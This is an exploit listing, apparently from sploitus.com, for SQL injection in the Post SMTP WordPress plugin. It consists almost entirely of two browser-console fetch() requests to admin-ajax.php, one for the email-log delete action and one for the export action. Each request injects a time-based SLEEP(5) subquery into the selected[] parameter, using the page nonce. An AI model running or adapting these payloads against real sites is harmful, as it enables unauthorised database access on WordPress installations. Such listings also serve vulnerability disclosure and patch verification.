Share
## https://sploitus.com/exploit?id=WPEX-ID:AB5C42CA-EE7D-4344-BD88-0D727ED3D9C4
# In `ps-delete-email-logs` action:
Visit the Post SMTP > Email Log page and run the following code in the browser console:
nonce = document.getElementById('ps-email-log-nonce').value
await fetch("/wp-admin/admin-ajax.php", {
"credentials": "include",
"headers": {
"Content-Type": "application/x-www-form-urlencoded",
"Sec-Fetch-Site": "same-origin"
},
"body": "action=ps-delete-email-logs&security=" + nonce + "&selected%5B%5D=1)%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))a)#",
"method": "POST",
"mode": "cors"
});
# In `ps-export-email-logs` action:
Visit the Post SMTP > Email Log page and run the following code in the browser console:
nonce = document.getElementById('ps-email-log-nonce').value
await fetch("/wp-admin/admin-ajax.php", {
"credentials": "include",
"headers": {
"Content-Type": "application/x-www-form-urlencoded",
"Sec-Fetch-Site": "same-origin"
},
"body": "action=ps-export-email-logs&security=" + nonce + "&selected%5B%5D=1)%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))a)#",
"method": "POST",
"mode": "cors"
});